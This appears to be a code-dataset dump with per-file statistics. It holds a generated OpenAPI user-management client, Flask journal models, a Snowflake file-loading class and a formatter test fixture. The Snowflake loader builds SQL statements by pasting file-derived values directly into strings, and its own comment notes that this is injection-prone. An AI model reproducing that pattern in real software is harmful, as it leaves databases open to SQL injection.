            'nullable': [
            ],
            'enum': [
            ],
            'validation': [
            ]
        },
        root_map={
            'validations': {
            },
            'allowed_values': {
            },
            'openapi_types': {
                'id':
                    (float,),
                'set_admin_level_dto':
                    (SetAdminLevelDto,),
            },
            'attribute_map': {
                'id': 'id',
            },
            'location_map': {
                'id': 'path',
                'set_admin_level_dto': 'body',
            },
            'collection_format_map': {
            }
        },
        headers_map={
            'accept': [
                'application/json'
            ],
            'content_type': [
                'application/json'
            ]
        },
        api_client=api_client
    )
def users_controller_create(
    self,
    create_user_dto,
    **kwargs
):
    """Creates a new user  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.users_controller_create(create_user_dto, async_req=True)
    >>> result = thread.get()

    Args:
        create_user_dto (CreateUserDto):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done one the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done one the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        User
            If the method is called asynchronously, returns the request
            thread.
    """
    # Normalize the framework kwargs to their defaults before delegating,
    # so _Endpoint.call_with_http_info always sees a complete set.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_spec_property_naming'] = kwargs.get(
        '_spec_property_naming', False
    )
    kwargs['_content_type'] = kwargs.get(
        '_content_type')
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['create_user_dto'] = \
        create_user_dto
    return self.users_controller_create_endpoint.call_with_http_info(**kwargs)
def users_controller_delete(
    self,
    id,
    **kwargs
):
    """Deletes specified user  # noqa: E501

    Synchronous by default; pass async_req=True to execute asynchronously,
    in which case the request thread is returned instead of the result.

    >>> thread = api.users_controller_delete(id, async_req=True)
    >>> result = thread.get()

    Args:
        id (float): identifier of the user to delete

    Keyword Args:
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object is
            returned without reading/decoding response data. Default is True.
        _request_timeout (int/float/tuple): a single number for the total
            request timeout, or a (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _spec_property_naming (bool): True if input variable names are the
            serialized names from the OpenAPI document; False for pythonic
            snake_case names (default).
        _content_type (str/None): force the body content-type. Default is
            None, in which case it is predicted from the allowed
            content-types and the body.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        None
        If the method is called asynchronously, returns the request thread.
    """
    # Fill in the client-framework defaults for every option the caller
    # did not supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_spec_property_naming', False),
        ('_content_type', None),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['id'] = id
    return self.users_controller_delete_endpoint.call_with_http_info(**kwargs)
def users_controller_get_administered_sites(
    self,
    **kwargs
):
    """Returns the administered sites of the signed in user  # noqa: E501

    Synchronous by default; pass async_req=True to execute asynchronously,
    in which case the request thread is returned instead of the result.

    >>> thread = api.users_controller_get_administered_sites(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object is
            returned without reading/decoding response data. Default is True.
        _request_timeout (int/float/tuple): a single number for the total
            request timeout, or a (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _spec_property_naming (bool): True if input variable names are the
            serialized names from the OpenAPI document; False for pythonic
            snake_case names (default).
        _content_type (str/None): force the body content-type. Default is
            None, in which case it is predicted from the allowed
            content-types and the body.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Site]
        If the method is called asynchronously, returns the request thread.
    """
    # Fill in the client-framework defaults for every option the caller
    # did not supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_spec_property_naming', False),
        ('_content_type', None),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.users_controller_get_administered_sites_endpoint.call_with_http_info(**kwargs)
def users_controller_get_self(
    self,
    **kwargs
):
    """Returns the currently signed in user  # noqa: E501

    Synchronous by default; pass async_req=True to execute asynchronously,
    in which case the request thread is returned instead of the result.

    >>> thread = api.users_controller_get_self(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object is
            returned without reading/decoding response data. Default is True.
        _request_timeout (int/float/tuple): a single number for the total
            request timeout, or a (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _spec_property_naming (bool): True if input variable names are the
            serialized names from the OpenAPI document; False for pythonic
            snake_case names (default).
        _content_type (str/None): force the body content-type. Default is
            None, in which case it is predicted from the allowed
            content-types and the body.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        User
        If the method is called asynchronously, returns the request thread.
    """
    # Fill in the client-framework defaults for every option the caller
    # did not supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_spec_property_naming', False),
        ('_content_type', None),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.users_controller_get_self_endpoint.call_with_http_info(**kwargs)
def users_controller_set_admin_level(
    self,
    id,
    set_admin_level_dto,
    **kwargs
):
    """Updates the access level of a user  # noqa: E501

    Synchronous by default; pass async_req=True to execute asynchronously,
    in which case the request thread is returned instead of the result.

    >>> thread = api.users_controller_set_admin_level(id, set_admin_level_dto, async_req=True)
    >>> result = thread.get()

    Args:
        id (float): identifier of the user to update
        set_admin_level_dto (SetAdminLevelDto): the new access level payload

    Keyword Args:
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object is
            returned without reading/decoding response data. Default is True.
        _request_timeout (int/float/tuple): a single number for the total
            request timeout, or a (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _spec_property_naming (bool): True if input variable names are the
            serialized names from the OpenAPI document; False for pythonic
            snake_case names (default).
        _content_type (str/None): force the body content-type. Default is
            None, in which case it is predicted from the allowed
            content-types and the body.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        None
        If the method is called asynchronously, returns the request thread.
    """
    # Fill in the client-framework defaults for every option the caller
    # did not supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_spec_property_naming', False),
        ('_content_type', None),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['id'] = id
    kwargs['set_admin_level_dto'] = set_admin_level_dto
    return self.users_controller_set_admin_level_endpoint.call_with_http_info(**kwargs)
| 35.967115
| 98
| 0.512385
| 2,327
| 24,062
| 5.039106
| 0.088956
| 0.034539
| 0.022173
| 0.023026
| 0.882654
| 0.852123
| 0.839843
| 0.814003
| 0.805219
| 0.790551
| 0
| 0.002875
| 0.407281
| 24,062
| 668
| 99
| 36.020958
| 0.81931
| 0.389618
| 0
| 0.622066
| 1
| 0
| 0.2285
| 0.054132
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.021127
| 0
| 0.049296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7871513213a8e46582179f91a12da0691bb9ada6
| 2,705
|
py
|
Python
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 50
|
2020-09-29T17:11:10.000Z
|
2021-11-15T11:46:10.000Z
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 1
|
2021-04-12T15:50:17.000Z
|
2021-08-20T15:13:21.000Z
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 2
|
2020-10-05T21:10:24.000Z
|
2020-10-06T09:29:43.000Z
|
from models.user import db
class Day(db.Model):
    """A single day's journal entry, linked to a user by email."""
    __tablename__ = "day"

    id = db.Column(db.Integer, primary_key=True)
    # BUGFIX: the original declared `number` twice; the second definition
    # (with unique=True) is the one SQLAlchemy actually used, so only it is
    # kept here. NOTE(review): a globally unique day number looks suspicious
    # — confirm whether uniqueness was meant to be per-user instead (the
    # sibling Week/Month/Year/Decade models have no unique constraint).
    number = db.Column(db.Integer, unique=True)
    textcontent = db.Column(db.Text)
    colors = db.Column(db.Text)
    # connect day to user via the users table's email column
    user_email = db.Column(db.Text, db.ForeignKey("users.email"))

    def __init__(self, textcontent, user_email, number, colors):
        self.textcontent = textcontent
        self.user_email = user_email
        self.number = number
        self.colors = colors
class Week(db.Model):
    """A single week's journal entry, linked to a user by email."""
    __tablename__ = "week"

    id = db.Column(db.Integer, primary_key=True)
    number = db.Column(db.Integer)
    textcontent = db.Column(db.Text)
    colors = db.Column(db.Text)
    # connect week to user via the users table's email column
    user_email = db.Column(db.Text, db.ForeignKey("users.email"))

    def __init__(self, textcontent, user_email, number, colors):
        # Plain attribute assignment; SQLAlchemy maps these onto the columns.
        self.textcontent, self.user_email = textcontent, user_email
        self.number, self.colors = number, colors
class Month(db.Model):
    """A single month's journal entry, linked to a user by email."""
    __tablename__ = "month"

    id = db.Column(db.Integer, primary_key=True)
    number = db.Column(db.Integer)
    textcontent = db.Column(db.Text)
    colors = db.Column(db.Text)
    # connect month to user via the users table's email column
    user_email = db.Column(db.Text, db.ForeignKey("users.email"))

    def __init__(self, textcontent, user_email, number, colors):
        # Plain attribute assignment; SQLAlchemy maps these onto the columns.
        self.textcontent, self.user_email = textcontent, user_email
        self.number, self.colors = number, colors
class Year(db.Model):
    """A single year's journal entry, linked to a user by email."""
    __tablename__ = "year"

    id = db.Column(db.Integer, primary_key=True)
    number = db.Column(db.Integer)
    textcontent = db.Column(db.Text)
    colors = db.Column(db.Text)
    # connect year to user via the users table's email column
    user_email = db.Column(db.Text, db.ForeignKey("users.email"))

    def __init__(self, textcontent, user_email, number, colors):
        # Plain attribute assignment; SQLAlchemy maps these onto the columns.
        self.textcontent, self.user_email = textcontent, user_email
        self.number, self.colors = number, colors

    def __repr__(self):
        # Human-readable form shown in logs and interactive sessions.
        return f"Year {self.number} -- {self.textcontent}"
class Decade(db.Model):
    """A single decade's journal entry, linked to a user by email."""
    __tablename__ = "decade"

    id = db.Column(db.Integer, primary_key=True)
    number = db.Column(db.Integer)
    textcontent = db.Column(db.Text)
    colors = db.Column(db.Text)
    # connect decade to user via the users table's email column
    user_email = db.Column(db.Text, db.ForeignKey("users.email"))

    def __init__(self, textcontent, user_email, number, colors):
        # Plain attribute assignment; SQLAlchemy maps these onto the columns.
        self.textcontent, self.user_email = textcontent, user_email
        self.number, self.colors = number, colors

    def __repr__(self):
        # repr is just the stored text for this model.
        return self.textcontent
| 28.776596
| 65
| 0.65841
| 353
| 2,705
| 4.838527
| 0.09915
| 0.12178
| 0.152225
| 0.122951
| 0.876464
| 0.862998
| 0.862998
| 0.862998
| 0.862998
| 0.862998
| 0
| 0
| 0.226987
| 2,705
| 93
| 66
| 29.086022
| 0.816834
| 0.036599
| 0
| 0.787879
| 0
| 0
| 0.045
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106061
| false
| 0
| 0.015152
| 0.030303
| 0.69697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
78801da06054edd6c91e0210bcb314fb0e21f262
| 18,788
|
py
|
Python
|
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
import snowflake.connector
from snowflake.connector.pandas_tools import write_pandas
from snowflake.connector.pandas_tools import pd_writer
import pandas as pd
import os
import datetime
import re
# ---------------------------------------------------------------------------
# Pandas display settings: disable all output truncation so the generated
# SQL / DataFrame dumps print in full.
# ---------------------------------------------------------------------------
for _display_option in ("max_rows", "max_columns", "width", "max_colwidth"):
    pd.set_option(f"display.{_display_option}", None)
class SnowPipe():
    """Loads local data files (csv / json / parquet) into Snowflake tables.

    For every regular file in the file type's upload directory the loader:
      1. derives an uppercase, sanitized table name from the file name,
      2. creates the table from a pandas-inferred schema if it is missing,
      3. generates and executes one INSERT statement per DataFrame row.

    Fixes over the original implementation:
      * the json branch never set ``full_path`` (AttributeError) and never
        derived a table name, silently reusing a stale one;
      * the parquet branch listed '../Upload/csv/' instead of the parquet
        upload directory;
      * the "wrong file type" error message always said "csv" regardless of
        the requested type;
      * the three near-identical ~80-line branches are collapsed into shared
        helpers.
    """

    # Each supported file type mapped to (upload directory, pandas reader).
    _FILE_TYPES = {
        'csv': ('../Upload/csv/', pd.read_csv),
        'json': ('../Upload/json/', pd.read_json),
        'parquet': ('../Upload/parquet/', pd.read_parquet),
    }

    def __init__(self, org, warehouse, usr, pwd, role, database, schema=None):
        self.org = org
        self.warehouse = warehouse
        self.usr = usr
        self.pwd = pwd
        self.role = role
        self.database = database
        self.schema = schema

    @property
    def Validate_Parms(self):
        """Return the configured connection parameters for inspection."""
        return {'org': self.org,
                'usr': self.usr,
                'warehouse': self.warehouse,
                'pwd': self.pwd,
                'role': self.role,
                'database': self.database,
                'schema': self.schema,
                }

    @property
    def Connection_Cursor(self) -> snowflake.connector.connect:
        """Open and return a new Snowflake connection.

        Matches the original behaviour: on failure the error is printed and
        the property evaluates to None (callers will then fail on attribute
        access) — NOTE(review): consider re-raising instead.
        """
        try:
            ctx = snowflake.connector.connect(
                user=self.usr,
                password=self.pwd,
                account=self.org
            )
            return ctx
        except Exception as e:
            print(f"connection to Snowflake failed \n Error received {e}:")

    def SnowPy(self, file_type: str):
        """Load every ``file_type`` file from its upload directory into Snowflake.

        Args:
            file_type: one of 'csv', 'json', 'parquet'. Exits the process
                with -1 on any other value (original behaviour).
        """
        self.file_type = file_type
        if file_type not in self._FILE_TYPES:
            print('invalid file type specified please use one of the following "csv","json","parquet"')
            exit(-1)
        dirname, reader = self._FILE_TYPES[file_type]
        self._load_directory(file_type, dirname, reader)

    def _load_directory(self, expected_type, dirname, reader):
        """Read each regular file in ``dirname`` with ``reader`` and load it."""
        full_path = os.path.abspath(dirname)
        candidates = (os.path.join(full_path, name) for name in os.listdir(dirname))
        for file in (p for p in candidates if os.path.isfile(p)):
            file_name = str(os.path.basename(file))
            # NOTE(review): split('.')[1] mirrors the original and misbehaves
            # on file names that contain extra dots.
            actual_type = file_name.split('.')[1]
            if actual_type != expected_type:
                print(f'Error wrong file type added to this folder please add only {expected_type} files to this directory')
                exit(-1)
            # Uppercase and replace every non-alphanumeric run with '_' so the
            # name is a valid Snowflake identifier.
            table_name = re.sub("[^0-9a-zA-Z$]+", "_", file_name.upper().split('.')[0])
            df = reader(file)
            df.columns = df.columns.str.replace("[^0-9a-zA-Z$]+", "_", regex=True)
            df.columns = [c.upper() for c in df.columns]
            # Audit columns: when the row was loaded and from which file.
            df['LOAD_DATE'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y/%m/%d %H:%M:%S %p')
            df['FILE_NAME'] = file_name
            self._load_dataframe(df, table_name)

    def _table_exists(self, table_name):
        """Return True when ``table_name`` already exists in the database."""
        cursor = self.Connection_Cursor.execute_string(f'''
        USE ROLE {self.role};
        USE DATABASE {self.database};
        SHOW TABLES
        ''', remove_comments=True)
        tables = pd.DataFrame(cursor[-1])
        # Column 1 of SHOW TABLES output is the table name.
        return not tables[tables[1] == table_name].empty

    def _load_dataframe(self, df, table_name):
        """Create ``table_name`` if needed, then insert every row of ``df``.

        WARNING: identifiers and values are interpolated directly into SQL
        (as in the original); this is only acceptable because the inputs come
        from local file names and constructor arguments, never from
        untrusted users.
        """
        if not self._table_exists(table_name):
            print(f'Table does not exist creating new table {table_name}')
            ddl = pd.io.sql.get_schema(df, table_name).replace('"', '')
            create_table = self.Connection_Cursor.execute_string(f"""
            USE ROLE {self.role};
            USE DATABASE {self.database};
            USE SCHEMA {self.schema};
            {ddl};""")
            for c in create_table:
                for row in c:
                    print(row)
        else:
            print(f'Table exists loading data into existing table {table_name}')
        # generating insert statement guarantees data accuracy #
        df['col'] = '("' + '","'.join([str(i) for i in df.columns.tolist()]) + '")'
        df['values'] = df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''), axis=1)
        df['insert'] = df.apply(
            lambda x: f'INSERT INTO {self.database}.{self.schema}.{table_name} {x["col"]} VALUES {x["values"]};',
            axis=1)
        insert_statement = df['insert'].to_string(index=False)
        insert_into = self.Connection_Cursor.execute_string(f'''
        USE ROLE {self.role};
        USE WAREHOUSE {self.warehouse};
        USE DATABASE {self.database};
        USE SCHEMA {self.schema};
        {insert_statement}
        ''')
        for c in insert_into:
            for row in c:
                print(row)
# SECURITY(review): the original hard-coded a real account, username and
# password on this line — those credentials are exposed in version control
# and must be rotated immediately. Connection settings now come from
# environment variables, and the load only runs when this file is executed
# as a script instead of firing on import.
if __name__ == "__main__":
    SnowPipe(
        org=os.environ["SNOWFLAKE_ORG"],
        usr=os.environ["SNOWFLAKE_USER"],
        pwd=os.environ["SNOWFLAKE_PASSWORD"],
        role=os.environ.get("SNOWFLAKE_ROLE", "PROD_BRONZE_DB_ROOT"),
        database=os.environ.get("SNOWFLAKE_DATABASE", "PROD_BRONZE_DB"),
        schema=os.environ.get("SNOWFLAKE_SCHEMA", "STAGING"),
        warehouse=os.environ.get("SNOWFLAKE_WAREHOUSE", "PROD_ANALYTICS_WH"),
    ).SnowPy("csv")
| 52.480447
| 206
| 0.429423
| 1,814
| 18,788
| 4.334068
| 0.097574
| 0.064106
| 0.031417
| 0.028619
| 0.865429
| 0.852073
| 0.826762
| 0.826762
| 0.826762
| 0.826762
| 0
| 0.004923
| 0.437779
| 18,788
| 357
| 207
| 52.627451
| 0.739373
| 0.026293
| 0
| 0.782772
| 0
| 0.022472
| 0.325461
| 0.027823
| 0.022472
| 0
| 0
| 0
| 0
| 1
| 0.014981
| false
| 0.003745
| 0.026217
| 0.003745
| 0.052434
| 0.078652
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
152610f981700cfe147078ac5e571f0ad359878c
| 85
|
py
|
Python
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# Formatter test fixture: two calls with continuation-indented argument
# lists — one closing with a trailing comma and the paren on its own line,
# one closing on the last argument's line.
# NOTE(review): presumably IDE-formatter test data, not runnable code — if
# executed, these calls raise TypeError because builtin sum() takes an
# iterable (plus an optional start), not four bare numbers.
sum(
    1,
    2, 3,
    5,
)
sum(
    1,
    2, 3,
    5)
| 7.727273
| 13
| 0.164706
| 10
| 85
| 1.4
| 0.5
| 0.571429
| 0.714286
| 0.857143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32
| 0.705882
| 85
| 10
| 14
| 8.5
| 0.24
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.